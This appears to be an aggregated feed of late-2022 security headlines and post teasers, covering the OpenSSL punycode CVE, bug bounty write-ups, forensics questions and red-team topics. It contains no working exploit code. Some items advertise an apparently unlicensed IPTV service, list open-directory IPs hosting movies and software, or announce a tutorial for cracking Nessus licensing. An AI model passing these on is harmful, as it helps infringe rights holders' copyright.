    Author: xxhzz@星阑科技PortalLab. Original link: https://mp.weixin.qq.com/s/iAEDu3noxYvZ6xhxeN-reA. Vulnerability description: On July 6, Apache published a security advisory fixing a remote code execution vulnerability in the Apache Commons Configuration component, vulnerability ID: CVE-2022-33980, threat level: high. An attacker exploiting this vulnerability can, on the target...
  • Open

    AllUKandUSATv
    I'm not sure if this is allowed or not, feel free to delete this if so. I am in the UK and am offering an IPTV service for Firesticks or Android devices. You get pretty much everything: live TV, thousands of channels from all across the world, thousands of videos on demand and equal amounts of box sets and TV series. 25 pounds for the year, or you can get a free 3-day trial, then get in touch if you like it. So PM me if you're interested. Sorry for the shameless advertising but I'm literally trying to make rent money here haha. submitted by /u/Reasonablyoptimistic [link] [comments]
    Small list of ODs
    http://fina.dyndns.tv (Movies) http://188.165.227.112 (Movies, Music, TV & Other) https://stuff.mit.edu/afs/sipb/user/quentin/ra-b/ (Random) https://150.uptv.ir/uptv/serial/Doctor%20Who/ (Doctor Who) https://up.metropol247.co.uk/list/ (Random) http://files.comclub.org (Stuff from 2005-2006) submitted by /u/ilikemacsalot [link] [comments]
    index of SQL statements
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Some TTRPG stuff.
    submitted by /u/NullVoidPointer [link] [comments]
  • Open

    Awesome Security Newsletters
    submitted by /u/mymalema [link] [comments]
    Dozens More PyPI Packages Attempting to Deliver W4SP Stealer in Ongoing Supply-Chain Attack
    submitted by /u/louis11 [link] [comments]
    The OpenSSL punycode vulnerability (CVE-2022-3602): Overview, detection, exploitation, and remediation | Datadog Security Labs
    submitted by /u/RedTermSession [link] [comments]
    OpenSSL Blog Post with FAQs - CVE-2022-3786 and CVE-2022-3602: X.509 Email Address Buffer Overflows
    submitted by /u/Gallus [link] [comments]
    OpenSSL version 3.0.7 published - Fixed two buffer overflows in punycode decoding functions
    submitted by /u/Gallus [link] [comments]
    List of (un)affected software OpenSSL vulnerability (still being updated)
    submitted by /u/Triyujin [link] [comments]
    Exploiting Static Site Generators: When Static Is Not Actually Static
    submitted by /u/Mempodipper [link] [comments]
  • Open

    5G network and faraday bags
    Hi together, Have you guys discovered any issues with faraday bags and 5G frequencies? I noticed on an iPhone 13 running an eSIM that the connection over 5G was still active. I wrapped the device in some layers of aluminum foil to be safe. I tried two different manufacturers of faraday bags. submitted by /u/Redox3D [link] [comments]
    Pagefile.sys
    Hey guys, Is anyone interested in the pagefile.sys on Windows? I just had a case where Bing would show the user the first page of images, say 10 images, which is normal if you don't scroll down in Bing. But if you stop and look at the pagefile and process it forensically, you will see that for every image Bing shows you, it is putting around 10 other images in the pagefile. They are first put into the browser cache, and then moved into the pagefile. It is impossible to know if the user has viewed the carved contents of the pagefile. Does anyone want to see a little, redacted write-up of how this works? If you have to deal with pagefile questions it might be interesting. Let me know and I'll post a little document, like a casual white paper, that I wrote about this just now. It involves browser image and link prefetching, browser image cache, pagefile.sys, and Bing. submitted by /u/metrophile [link] [comments]
    Password Cracking Windows 10 Forensics Image?
    Hello everyone! A company employee set the password on Windows 10 before being fired for selling documents to competitors. We have the forensic copy (.E01). How can we crack the Windows 10 password? submitted by /u/Zipper_Ita [link] [comments]
    A technical analysis of Pegasus for Android – Part 3
    submitted by /u/CyberMasterV [link] [comments]
  • Open

    IDOR in API applications (able to see any API token, leads to account takeover)
    Automattic disclosed a bug submitted by bugra: https://hackerone.com/reports/1695454 - Bounty: $500
  • Open

    SSL RCE Vulnerability
    Article URL: https://github.com/NCSC-NL/OpenSSL-2022 Comments URL: https://news.ycombinator.com/item?id=33426552 Points: 1 # Comments: 0
    Demystifying the OpenSSL punycode vulnerability and exploitation walk-through
    Article URL: https://securitylabs.datadoghq.com/articles/openssl-november-1-vulnerabilities/ Comments URL: https://news.ycombinator.com/item?id=33424330 Points: 2 # Comments: 0
    Operational information regarding OpenSSL 3 vulnerability
    Article URL: https://github.com/NCSC-NL/OpenSSL-2022 Comments URL: https://news.ycombinator.com/item?id=33417830 Points: 4 # Comments: 0
    Newbies Guide to Vulnerability Management
    Vulnerability management is the process to identify, prioritise and remediate the security vulnerabilities present in a software or a system. It helps to improve the overall cybersecurity posture of the organisation. The software and network vulnerabilities are high-risk vectors. An attacker with the help of these vulnerabilities can exploit their system and can also steal sensitive user data. So, it’s important for any organisation to constantly identify vulnerabilities present in their system and take appropriate action to remediate them. Vulnerability management is essential for organisations of all sizes viz. startups, MSMEs, and Enterprises. The need can vary from following various compliance and regulations mandates like ISO 27001, PCI-DSS, HIPAA etc or maintaining strong security an…
    OpenSSL Overview of software (un)affected by vulnerability
    Article URL: https://github.com/NCSC-NL/OpenSSL-2022/blob/main/software/README.md Comments URL: https://news.ycombinator.com/item?id=33417551 Points: 13 # Comments: 0
    Effectively Preparing for the OpenSSL 3.x Vulnerability
    Article URL: https://www.akamai.com/blog/security-research/openssl-vulnerability-how-to-effectively-prepare Comments URL: https://news.ycombinator.com/item?id=33416807 Points: 3 # Comments: 0
    New OpenSSL 3 critical vulnerability
    Article URL: https://snyk.io/blog/new-openssl-critical-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=33416519 Points: 2 # Comments: 0
  • Open

    My Pages
    There are a lot of different pages out there with information on various topics. My suggestion to people getting started with PAI research… Continue reading on Medium »
  • Open

    CVE-2022-3602
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-3602 Comments URL: https://news.ycombinator.com/item?id=33425601 Points: 1 # Comments: 0
  • Open

    Red Team Fundamentals
    Let us know about the fundamental of the red team Continue reading on Medium »
    Encrypting Shellcode with XOR | Offensive coding in C
    Hello fellow red teamers. One of the techniques for AV evasion is encryption. While there are many, many encryption algorithms, XOR is… Continue reading on Medium »
    Red Teaming TTPs
    Useful Techniques, Tactics, and Procedures for red teamers and defenders, alike! Continue reading on Medium »
  • Open

    SecWiki News 2022-11-01 Review
    Revealing the Development of US Military Cyberspace Operations from the Attack on Northwestern Polytechnical University by ourren; A Brief Analysis of the Team Finance Hack by ourren; Practical Exploration of Data Security Classification and Grading by ourren. For more of the latest articles, visit SecWiki.
  • Open

    How to do A penetration test in 4 hours
    Most penetration testing firms require a penetration test assessment as part of the interview process. The tests are generally time-boxed to 4-24 hours. I do the test but never pass or receive any feedback. Any tips or advice? submitted by /u/Successful-Plant-276 [link] [comments]
    PenTest Sophos XG
    Hi, has anyone pentested against a Sophos XG firewall? submitted by /u/Electrical_Orchid511 [link] [comments]
    Please explain this about government IT security?
    Everyday on this forum, we see people posting up questions worrying about security mechanisms and configurations for their organisations. For example, an employee from the accounts dept. of an autoparts distributor needs an ultra-secure VPN setup because she works from home of a Friday. But then we hear that the UK government actually uses WhatsApp for official communications? WTF? How does an entity like the UK government ever allow WhatsApp to be compliant with their IT security policy? submitted by /u/baghdadcafe [link] [comments]
  • Open

    Nighthawk 0.2.1 - Haunting Blue - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
  • Open

    Windows Processes, Nefarious Anomalies, and You: Memory Regions
    While operating on a red team, the likelihood of an Endpoint Detection and Response (EDR) being present on a host is becoming increasingly higher than it was a few years ago. When an implant is being initiated on a host, whether it’s on-disk or loaded into memory, then there is a lot to consider. In... The post Windows Processes, Nefarious Anomalies, and You: Memory Regions appeared first on TrustedSec.
  • Open

    Write-up: Remote code execution via web shell upload @ PortSwigger Academy
    No content preview
    My Hall of Fame at United Nations Success Story
    No content preview
    Building a SIEM: centralized logging of all Linux commands with ELK + auditd
    No content preview
  • Open

    FreeBuf Morning Report | White House Convenes International Ransomware Summit; Samsung Galaxy Store Hit by Serious Vulnerability
    The United States will meet with delegations from more than 36 countries/regions to share intelligence and develop strategies to counter serious and costly ransomware attacks on critical infrastructure.
    Offline Installation and Cracking of Nessus 10.3.0 on Ubuntu 20.04
    The Nessus distribution on Ubuntu differs from the one on Kali, so the cracking process is slightly different. A cracking tutorial has been put together here for everyone's study and research.
    Major Topics Announced | Registration for the CIS 2022 Cybersecurity Innovation Conference Shenzhen Sub-venue Is in Full Swing
    On November 23, the Shenzhen sub-venue of the CIS 2022 Cybersecurity Innovation Conference will also be held on schedule.
    Data of 23 Million Taiwan Residents Leaked; Hacker Asks $5,000
    A hacker is selling 200,000 account records of Taiwan residents on the foreign forum “BreachForums” and claims to hold the information of 23 million people in Taiwan.
    Hackers Sell Access to 576 Corporate Networks for $4 Million
    A recent report by Israeli cyber intelligence firm KELA shows that in Q3 2022, hackers were observed selling access to the networks of 576 companies worldwide for a total of $4 million.
    Fodcha DDoS Botnet Re-emerges with New Capabilities
    Fodcha has now evolved into a large-scale botnet with over 60,000 active nodes and 40 command-and-control (C2) domains, capable of easily generating more than 1 Tbps of traffic.
  • Open

    CVE-2022-33891 Apache Spark Shell Command Injection Vulnerability Analysis
    Author: xxhzz@星阑科技PortalLab. Original link: https://mp.weixin.qq.com/s/ajggDNF__M4pC_pCf5eTsw. Vulnerability description: On July 18, Apache published a security advisory fixing a command injection vulnerability in Apache Spark. Vulnerability ID: CVE-2022-33891, threat level: high. The Apache Spark UI provides, via the configuration option Spark .acl .e...
  • Open

    Testing Registry Modification Scenarios
    After reading some of the various open reports regarding how malware or threat actors were "using" the Registry, manipulating it to meet their needs, I wanted to take a look and see what the effects or impacts of these actions might "look like" from a dead-box, DFIR perspective, looking solely at the Registry. I wanted to start with an approach similar to what I've experienced during my time in IR, particularly the early days, before EDR, before things like Sysmon or enabling Process Tracking in the Security Event Log. I thought that would be appropriate, given what appears to be the sheer number of organizations with limited visibility into their infrastructures. For those orgs that have deployed Sysmon, the current version (v14.1) has three event IDs (12, 13, and 14) that pertain to the…
  • Open

    No Hat 2022 Conference Recordings
    submitted by /u/Khryse [link] [comments]
    Fugu15 - a semi-untethered permasigned jailbreak for iOS 15
    submitted by /u/_rs [link] [comments]
    A tale of a simple Apple kernel bug
    submitted by /u/JordyZomer [link] [comments]
    Abusing windows’ tokens to compromise active directory without touching lsass
    submitted by /u/sanitybit [link] [comments]
    New Microcorruption Challenges - Embedded Hardware Security CTF
    submitted by /u/sanitybit [link] [comments]
    What I learnt from reading 217 subdomain takeover bug reports.
    submitted by /u/_nynan [link] [comments]
    Vulnerability and Exploit feeds
    submitted by /u/AnyYak5018 [link] [comments]
    Baby steps into MITRE Stix/Taxii, Pandas, Graphs & Jupyter notebooks
    submitted by /u/DiabloHorn [link] [comments]
  • Open

    Tell HN: Reminder: Critical OpenSSL CVE Goes Public Tomorrow at 1300-1700 UTC
    Reminder for OpenSSL CVE going public tomorrow at 1300-1700 UTC: The OpenSSL project team would like to announce the forthcoming release of OpenSSL version 3.0.7. This release will be made available on Tuesday 1st November 2022 between 1300-1700 UTC. OpenSSL 3.0.7 is a security-fix release. The highest severity issue fixed in this release is CRITICAL. Comments URL: https://news.ycombinator.com/item?id=33413910 Points: 2 # Comments: 2
  • Open

    P1 Bounties: File Upload to RCE == $$
    TL;DR- One of the most satisfying bounties at P1 ranking is RCE. All you need are a few open source tools and a php script for testing. Continue reading on The Gray Area »
    How I found accidentally copy-pasted Gmail inboxes
    It all started with this text in my own Gmail: Continue reading on Medium »
    TOP 5 AWESOME BUG BOUNTY BOOKS FOR BEGINNERS THAT YOU SHOULD KNOW
    This article was originally published on BePractical Continue reading on Medium »
    Blind SQL Injection on Delete Request
    Hi everyone, I am an Independent Cyber Security Researcher and a Red Team Member of SYNACK from Bangladesh. Continue reading on Medium »
    What I learnt from reading 217* Subdomain Takeover bug reports.
    A comprehensive analysis of Subdomain Takeovers (SDTO), DNS Hijacking, Dangling DNS, CNAME misconfigurations… Continue reading on Medium »
    Finding SQL injection vulnerabilities using Ghauri
    If you are familiar with sqlmap then you might want to give this tool a try. Ghauri is an advanced SQL injection tool used to automate the… Continue reading on Medium »
    2FA Bypass due to information disclosure & Improper access control.
    Continue reading on Medium »
    How to Find Escalating HTML to SSRF. I instantly got the Hall of Fame within 5minutes.
    Server Side Request Forgery through Html Injection: Continue reading on Medium »
    A $250 Entirely Automated Bug Bounty
    TL;DR- In my experience, the easiest bounties are fuzzing/leaked file ones, and all it takes is a few clicks of an automated tool to make… Continue reading on The Gray Area »
  • Open

    Critical Vulnerability in Open SSL
    Article URL: https://www.schneier.com/blog/archives/2022/10/critical-vulnerability-in-open-ssl.html Comments URL: https://news.ycombinator.com/item?id=33413028 Points: 1 # Comments: 1
  • Open

    How to detect OpenSSL versions in your organization?
    Given the recent news of the OpenSSL critical vulnerability I am trying to figure out which of our tech use OpenSSL. I checked our Tenable.io scans and they are all configured to include the OpenSSL Detection plugins. That being said, none of our scanned assets (1,000+ including web servers) reported detection of OpenSSL usage. What is a good way to go about detecting OpenSSL versions at an enterprise level? I find it hard to believe (according to tenable.io) that we're not using OpenSSL in any of our tech. submitted by /u/Practical_Bathroom53
    Esoteric Operating System as a daily driver?
    Has anyone used an esoteric operating system like OpenIndiana, for example, as a daily driver / workstation? Is it doable? What are the ups and downs? submitted by /u/LegitimateCelibate
    SANS Institute Masters Program
    Hey Everyone, I've read quite a bit on the SANS Institute Masters program and am curious if it'd be worth it for my personal situation and career goals. I'm in a Senior Sys Admin position with 3 years of experience. I have a BS in Computer Networks & Cybersecurity, Network+, Security+, and CASP certification. I'm scheduled to take the CISSP near the end of December (I'll be an associate until August 2023). I've been accepted into Georgetown's Cybersecurity Risk Management graduate program but have been eyeing the SANS Graduate program just because it has the opportunity to gain a lot of SANS certifications along the way. I'm open to taking on the debt if it'll pay off for me in the long run. Both Georgetown and SANS are about the same for tuition cost. I'm currently putting applications out there for entry Cybersecurity positions, mainly cyber defense positions. submitted by /u/ImplementCold4091
    Anybody know of a script that searches through a source code file for known vulnerabilities?
    Looking for something that finds matches for vulnerable code. EDIT: Looking for webapp bugs mainly. So JavaScript would be one language that I'll be looking at. submitted by /u/Independent-Onion875
  • Open

    Movies, series, software, games, audiobooks, and more
    http://79.137.34.186/ => Learning medias (sales, enterprises etc) http://91.134.114.137/ => Spanish racing content (videos, software) http://51.178.9.98/ => Anime, movies http://91.121.80.14:8080/ => mostly movies http://91.121.165.34/ => Games, software http://94.23.6.14:8080/ => Movies, series https://5.196.65.67/ => Spanish audiobooks https://37.187.125.63/downloads/ => French audiobooks, software, movies https://37.187.117.176:38946/ => Movies, audiobooks http://87.98.153.143:10080/ => Series, movies http://91.121.0.62:580/ => Chinese movies, series http://54.37.246.61/ => Photoshoot pictures (in /Deb) http://51.255.206.132:7081/ => Lots of movies and series (mostly french, there's multi) http://5.39.88.99:18080/ => Movies, series, courses (mostly french) http://5.135.153.41:9000/ => Courses, how-to guides, series (french and english) http://5.135.155.61/ => Raw anime video/audio/misc files http://5.135.155.232/ => Spanish radio rips Not making NSFW because they all seem clean, but I haven't been through it all. submitted by /u/MasterIO02
    public notices, newsletters and meeting minutes for Rochester, NY.
    submitted by /u/PM_ME_TO_PLAY_A_GAME
  • Open

    Authentication bypass for leads to take over any users account.
    Krisp disclosed a bug submitted by n0_m3rcy: https://hackerone.com/reports/1608151 - Bounty: $5000
    XSS in SocialIcon Link
    Linktree disclosed a bug submitted by sudi: https://hackerone.com/reports/1698652 - Bounty: $600
  • Open

    RedEye — Open Source Analytical tool
    RedEye is an analytical tool developed by CISA and DOE’s Pacific Northwest National Laboratory to assist Red Teams with visualizing and… Continue reading on Medium »
  • Open

    How To Simplify Fuzz Testing For C++
    Today I want to show you a way to simplify fuzz testing for your C++ applications. Continue reading on Medium »
    A $250 Entirely Automated Bug Bounty
    TL;DR- In my experience, the easiest bounties are fuzzing/leaked file ones, and all it takes is a few clicks of an automated tool to make… Continue reading on The Gray Area »
  • Open

    Tales from the Kernel Parameter Side
    submitted by /u/MiguelHzBz
    Need help finding specs needed for basic investigation programs
    Hi everyone! I am a lawyer at a criminal court and my place of work is willing to invest in a machine that would allow us to analyze and investigate forensic data. Sadly, we lack a person with the proper training to guide us in this acquisition, so it's all fallen down to... my basic little-above-average knowledge of computers. I am looking into the minimum spec requirements needed to run Cellebrite Reader, FTK Imager, X-Ways, maybe at some point Nuix, and I can't seem to find that information anywhere. Can you please help me? Additionally, but more as a bonus, do you people have any resources a layperson could use in order to get up to some kind of speed in this field? Thank you so much from a very lost lawyer who really appreciates your input. submitted by /u/Mana0307
  • Open

    SecWiki News 2022-10-31 Review
    RAID 2022 accepted papers list by ourren; Low-cost DIY SMS forwarder (Air780E+ESP32C3) by 路人甲; SecWiki Weekly (Issue 452) by ourren; APT28 sample analysis report by ourren; BREAK business risk enumeration and avoidance knowledge framework v0.1.0 by ourren; How many hurdles are there from scientist to entrepreneur? by ourren; Global Advanced Persistent Threat (APT) 2022 mid-year report by ourren; Understanding Java reflection in one article by SecIN Community; Written at the end of my PhD by ourren. For more of the latest articles, visit SecWiki
  • Open

    Banking Trojan Techniques: How Financially Motivated Malware Became Infrastructure
    Learning about the variety of techniques used by banking Trojans can help us detect other activities of financially motivated threat groups. The post Banking Trojan Techniques: How Financially Motivated Malware Became Infrastructure appeared first on Unit 42.
  • Open

    Scripts to detect Canary Tokens
    submitted by /u/DigiTroy
  • Open

    Write-up: Forced OAuth profile linking @ PortSwigger Academy
    No content preview
    Burp Suite? No Thanks! Blind SQLi in DVWA With Python (Part 3) — StackZero
    No content preview
    Android Pentesting 101 — Part 3
    No content preview
    Phoenix Challenges — Stack Two
    No content preview
  • Open

    FreeBuf Morning Report | Personal information of the whole of Taiwan Province put up for sale online; Windows 10 will permanently disable IE11
    Preliminary investigation confirms that the 200,000 records released so far are concentrated in Taiwan's Yilan area, and the data all matches.
    Data security thinking in the new situation | CIS 2022 Cybersecurity Innovation Conference topic preview
    Emerging technologies such as blockchain, big data and cloud computing are maturing rapidly, providing solid technical support for digital transformation across industries.
    A new open source tool is mass-scanning public AWS for "secrets"
    To help promptly discover secrets exposed on public S3 buckets, Harel created a Python tool called S3crets Scanner.
    CISA publishes cybersecurity KPIs for critical infrastructure sectors
    The report is the result of implementing the security memorandum signed by US President Biden in July 2022, and is planned to be updated every 6 to 12 months.
    Student arrested by German police on suspicion of running the DiDW darknet market
    The suspect faces criminal charges for operating an illegal trading platform and could be sentenced to up to ten years in prison.
    Foreign media report that former UK Prime Minister Truss's phone was hacked by Russian spies
    According to a Daily Mail report on October 30, former UK Prime Minister Liz Truss's personal phone was hacked by Russian spies during the summer leadership campaign.
    Leading an extortion group at 16: is the trend toward underage hackers obvious?
    Recently, teenage hackers, represented by the 16-year-old leader of LAPSUS$, have stirred up the whole world, but the question behind it, why they turned to cybercrime, deserves more thought.
  • Open

    RomCom hackers target Ukrainian military institutions
    Author: BlackBerry Research and Intelligence Team. Translator: Knownsec 404 Lab translation team. Original link: https://blogs.blackberry.com/en/2022/10/unattributed-romcom-threat-actor-spoofing-popular-apps-now-hits-ukrainian-militaries Summary: The previously unknown RomCom RAT threat actor is now targeting Ukrainian military institutions. Known...
    CVE-2022-26135 Atlassian Jira Mobile Plugin SSRF vulnerability analysis
    Author: xxhzz@星阑科技PortalLab. Original link: https://mp.weixin.qq.com/s/VaHYzhkn2gZhHcCPTdO-Tg Vulnerability description: On June 29, Atlassian issued a security advisory that a server-side request forgery (SSRF) vulnerability exists in multiple Atlassian Jira products; an authenticated remote attacker can send specially crafted requests to the Jira Core REST API, causing the server side to initiate forged req...
  • Open

    Phoenix Challenges -- Stack Two
    My latest writeup for the Exploit.Education Phoenix exploitation challenge is now live on my Medium blog. More are planned to be coming soon. Any feedback would be most welcome! https://secnate.medium.com/phoenix-challenges-stack-two-da59b290dfa submitted by /u/ProgrammingBro123
  • Open

    Cross-Site Request Forgery (CSRF) to xss
    MTN Group disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1183241
    Cross-site Scripting (XSS) - Reflected
    MTN Group disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1183336
  • Open

    What InfoSec Professionals Can Gain From TraceLabs CTF
    Trace Labs is designed to be a catalyst for improving the state of missing persons location and family reunification. Continue reading on The Sleuth Sheet »
    Challenge Ondes de choc
    Solution to the challenge posted on Twitter on 27 October 2022. Continue reading on Medium »
    SPY NEWS: 2022 — Week 43
    Summary of the espionage-related news stories for the Week 43 (October 23–29) of 2022. Continue reading on Medium »
  • Open

    Crack WiFi WPA2 PSK Encryption
    In today's topic we talk about how we can easily crack WiFi WPA2 PSK encryption by using a wordlist attack. Continue reading on Medium »
  • Open

    Paytm vendors Transaction count disclosure
    Paytm released QR scan code boxes to vendors to simplify their transactions! Continue reading on Medium »
    How Uber social engineering hack compromised Uber’s Hackerone bug bounty reports
    Uber faced another security breach in its network on the 15th of September. Just hours later Uber confirmed this by posting a tweet that… Continue reading on Medium »
    Android Pentesting 101 — Part 3
    Welcome to Part 3 of Android Pentesting. This series is about how you can hack into Android and find vulnerabilities in it using various… Continue reading on InfoSec Write-ups »
    Registrations Open for IWCON2022 Version 2.0 — the Online International Cybersecurity Conference
    Book your seats today! Continue reading on InfoSec Write-ups »
    Old RCE worth $3362.
    Have you ever read the article “RCE via Symfony Secret Fragments” ? If you haven’t read it, there are so many articles on Medium. Shodan… Continue reading on DevOps.dev »
    Palo Alto and Panorama — Hardening the Configuration
    As per Hardening Network Devices National Security Agency Cybersecurity Information, below points are covers in this Course. Continue reading on Medium »
  • Open

    SecWiki News 2022-10-30 Review
    No news updated today. For more of the latest articles, visit SecWiki
  • Open

    Can't find the signature column in EnCase v7 (20.3.0.214)
    submitted by /u/shalnark90
    How will the transition from physical SIM cards to e-SIM affect mobile device examinations?
    Apple made the transition to e-SIM in their iPhone 14 lineup. As more and more mobile device manufacturers continue to transition to that standard, how are investigations going to be affected, and the forensics profession as a whole? submitted by /u/Labios_Rotos77
    NAND memory chip
    Hey guys, I have this question, if you can help me: what happens to the data stored inside a NAND memory chip if it is broken or cracked? (I'm talking about the NAND memory chip inside the micro SD.) submitted by /u/Interesting_Let_1338
  • Open

    Thoughts on the Log4j2 remote code execution vulnerability (CVE-2021-44228)
    Vulnerability introduction: Apache Log4j2 is a Java-based logging tool. It rewrites the Log4j framework and introduces a large number of rich features. This logging framework is widely used in business system development to record log information. In most cases
    FreeBuf Morning Report | China's video IoT security market reaches US$283.2 million; Australian property company SSKB hit by cyberattack
    Strongly driven by national policies and standards and by hot-button events, the market size of China's video IoT security is US$283.2 million.
  • Open

    Part 3 of Lord Of The Ring0 - Sailing to the land of the user (and debugging the ship)
    submitted by /u/Idov31
    The Automated Penetration Testing Reporting System (APTRS). Pentester can easily maintain projects, customers, and vulnerabilities, and create PDF reports without needing to use traditional DOC files. The tool allows you to maintain a vulnerability database, so you won't need to repeat yourself.
    submitted by /u/Ano_F
  • Open

    Registrations Open for IWCON2022 Version 2.0 — the Online International Cybersecurity Conference
    No content preview
  • Open

    Can non-wireless/wireless peripherals connected to phones/computers send data?
    A mouse, Bluetooth earbuds for a phone, wired/wireless keyboards? Most of them come from China. I'm curious if there are chips in them that then use the host computer to take any data and leak it out? Just curious. submitted by /u/5553330
  • Open

    [Translation] Cilium: Better bandwidth management based on BPF+EDT+FQ+BBR (KubeCon+CloudNativeCon, 2022)
    Translator's preface: This article is a translation of a talk from KubeCon+CloudNativeCon Europe 2022: Better Bandwidth Management with eBPF. The authors, Daniel Borkmann, Christopher and Nikolay, are all from Isovalent (the company behind Cilium). Some background knowledge, code snippets and links were added during translation to aid understanding. Given the translator's limited ability, this article may contain omissions or errors; if in doubt, please consult the original. The translation follows. Translator's preface 1 Problem description 1.1 Container deployment density and (CPU, memory) resource management 1.2 Network resource management: bandwidth control models 1.3 Pod bandwidth management in K8s 1.3.1 Bandwidth meta plugin 1.3.2 Problems with ingress rate limiting 1.3.3 Problems with egress rate limiting 1.3.4 Summary of Bandwidth meta plugin problems 2 Solution approach 2.1 Back to the root: flaws in TCP's "send as fast as possible" model 2.2 Change of approach: no longer queue-based, but timestamp-based (EDT) 2.3 3 Applying EDT/timing-wheel to K8s 3 Cilium's native pod rate-limiting scheme 3.1 Overall design: container rate limiting based on BPF+EDT 3.2 Workflow 3.3 Packet processing 3.4 Performance comparison: Cilium vs. Bandwidth meta plugin 3.4 Summary 4 Public-network transmission: Cilium bandwidth management based on BBR 4.1 BBR basics 4.1.1 Design motivation 4.1.2 Performance comparison: bbr vs. cubic 4.2 BBR + K8s/Cilium 4.2.1 Existing problem: when crossing netns, skb->tstam…

  • Open

    Music in wma format.
    submitted by /u/International_Milk_1
    Index of bunglefever/ftp/pub (see comment)
    submitted by /u/International_Milk_1
    Index of /27/items/tntvillage_460222/Deep Purple Bootlegs/
    submitted by /u/International_Milk_1
    A lot of albums (see comment)
    submitted by /u/International_Milk_1
    Some full albums.
    submitted by /u/International_Milk_1
  • Open

    Urgent: Patch OpenSSL on November 1 to avoid “Critical” Security Vulnerability - GlobalSign
    submitted by /u/c0r0n3r
    GitHub - Legit-Labs/legitify: Detect and remediate misconfigurations and security risks across all your GitHub assets
    submitted by /u/roy_6472
    mitmproxy 9: WireGuard Mode and Raw UDP Support
    submitted by /u/mhils
  • Open

    Using stickers to fool facial recognition
    submitted by /u/verfahrensweise
  • Open

    Ask HN: Is your organisation patching the critical OpenSSL vulnerability?
    I'm wondering how many organisations aren't really aware yet of how serious this is. "OpenSSL warns of critical security vulnerability with upcoming patch We don't have the details yet, but we can safely say that come Nov. 1, everyone -- and I mean everyone -- will need to patch OpenSSL 3.x. " https://www.zdnet.com/article/openssl-warns-of-critical-security-vulnerability-with-upcoming-patch/ Comments URL: https://news.ycombinator.com/item?id=33388142 Points: 11 # Comments: 10
    Yellow security vulnerability repository is being removed – GitHub Changelog
    Article URL: https://github.blog/changelog/2022-10-28-yellow-security-vulnerability-repository-banner-is-being-removed/ Comments URL: https://news.ycombinator.com/item?id=33383440 Points: 1 # Comments: 0
    Patch OpenSSL on November 1 to avoid “critical” security vulnerability
    Article URL: https://www.globalsign.com/en/blog/urgent-patch-openssl-november-1-avoid-critical-security-vulnerability Comments URL: https://news.ycombinator.com/item?id=33380500 Points: 191 # Comments: 192
    Vulnerability: Infiltrating a network via Powerline (HomePlugAV) adapters (2014)
    Article URL: https://www.bentasker.co.uk/posts/documentation/security/282-infiltrating-a-network-via-powerline-homeplugav-adapters.html Comments URL: https://news.ycombinator.com/item?id=33379901 Points: 2 # Comments: 1
  • Open

    HTTP question
    Hi All, stupid question, but while searching for firewood I looked up the name of my usual supplier - exeterlogs.co.uk - put it in the Chrome address bar and hit enter, then ignored the warnings and continued to the http site. It was for a local electrician. www.exeterlogs.co.uk sent me to the correct site. How in this day and age can 2 websites have the same address? Is this a security failure of my computer? Many thanks for any replies. submitted by /u/ColdStatistician8872
    "Market share" of information security jobs?
    Hey, for a while now I keep thinking and changing my mind on what branch of the security field I should focus on. I know some programming, I know some DevOps, I know some systems engineering and I also have the OSCP, and I am currently doing a GCP Security Engineer course for the cert. However, I cannot make up my mind; all of these paths are very interesting and I would love to pursue them all (application security also sounds great), but of course there is no time and I want to make the most out of mine. Thus, I am trying to look for objective reasons for choosing one of them, and then compare with my subjective reasons. Soo, the actual question: is there a statistic on the number of job openings/salary expectations/salary capping for these kinds of roles? I appreciate any feedback on the matter and your take on this: how did you choose your career, would you change it, what is it, why would you change it and to what? Thanks, and let me know if the flair is not the right one. submitted by /u/GeologistLegitimate6
    Internal Pentest additional testing.
    Let's say I'm testing a lab, fairly well locked down; that said, I want to make sure that the lab has been properly tested. I have a limited scope, as well as rules, so I can't just go buckwild. Only one credential was found during breach research, which doesn't appear to be valid (lockout policy is tight, so spraying/stuffing seems unwise at a mass scale). Performed network scanning and vulnerability scanning. Network has a mix of OSes, nothing too out of date. All web servers seen appear to require credentials and are reasonably up to date, no obvious exploitable vulnerabilities. Responder has not captured any LLMNR/NBNS hashes. HSRP traffic was seen, but unable to exploit as of now. Can't use mitm6 or impacket for other reasons. No weak SNMP creds, no IPMI or the like. Researched OS versions in use, tried default credentials on the web services, tried interrogating SMB and other protocols to get credentials. SE is out of scope. What would you be doing in this situation? I should note that exploitation is not expected in this lab; like I said, the main goal is to make sure everything has been tested properly and then the work done documented. submitted by /u/realKevinNash
    Should all logs be saved in GMT+0 format, and then it is up to the security analyst's client machine to automatically change the time based on his location?
    We have a SIEM, and upon checking the web interface of a software we use, I can see that the local logs are being saved in GMT+0 date and time. The logs are sent to our SIEM, and then when I query the SIEM the _time shows the correct time because I set the time zone in the SIEM manually to the correct GMT. Is it correct to assume that if you are in a global company that works in different timezones, it is best practice to save all generated logs locally in GMT+0? submitted by /u/Ecstatic_Constant_63
  • Open

    Hats V2 Audit Competition. Up to $40K in prizes
    A new challenge at Hats Finance, this time with our own bug bounty platform. Continue reading on Medium »
    Simple DOM based XSS Trick
    Hello hackers, c0ff33b34n here to teach you an easy DOM based XSS trick. Continue reading on Medium »
    Walkthrough of Exploiting CVE-2022–42889 (Text4Shell/ACT4Shell)
    Summary Continue reading on System Weakness »
    5 Brain Hacks That Made me one among the Top 15 Security Researchers!
    Continue reading on ILLUMINATION »
    Some of the Best Search Engines used by Hackers/Security Researchers/Bug Bounty Hunters in 2022
    The most exciting part about being a security researcher is when you’ve got a hunch and you have that moment when you feel like you have… Continue reading on Medium »
    Finding live website using knockpy
    Hi, here i am going to show how to find live subdomains using knockpy. Continue reading on Medium »
    How I Fetched Millions of Confidential Files From the Server without the Permission of Concerned…
    NOTE : Continue reading on Medium »
  • Open

    2 Ways to Dump Lsass Without Mimikatz
    Local Security Authority Subsystem Service, or better known as LSASS, is one of the core software of a Windows server. It is responsible… Continue reading on Medium »
  • Open

    SecWiki News 2022-10-29 Review
    US national cybersecurity policy: EDR (endpoint detection and response) by 路人甲. For more of the latest articles, visit SecWiki
  • Open

    The Ultimate Guide of Deep and Dark Web Research — Part II
    The Seven Strategies for Researching the Deep and Dark Web Continue reading on Medium »
    The Ultimate Guide of Deep and Dark Web Research — Part I
